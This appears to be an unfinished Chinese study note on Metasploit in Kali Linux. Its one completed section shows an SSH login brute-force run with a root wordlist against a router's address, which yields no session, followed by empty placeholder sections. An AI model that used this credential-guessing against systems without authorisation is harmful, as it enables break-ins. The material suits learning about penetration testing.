本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程
- 破解无线 AP 的管理密码
###1.破解无线 AP 的管理密码 ###
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
\
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf auxiliary(ssh_login) > set RHOSTS 192.168.5.1
RHOSTS => 192.168.5.1
msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf auxiliary(ssh_login) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -i 1
[-] Invalid session identifier: 1
###2. ###
###3. ###
1.
2.
3.
4.
5.
6.
7.
###4. ###
1.
2.
3.
4.
5.
6.
7.
###5. ###
1.
2.
3.
4.
5.
6.
7.
###6. ###
1.
2.
3.
4.
5.
6.
7.
###7. ###
1.
2.
3.
4.
5.
6.
7.
###8. ###
1.
2.
3.
4.
5.
6.
7.
###9. ###
1.
2.
3.
4.
5.
6.
7.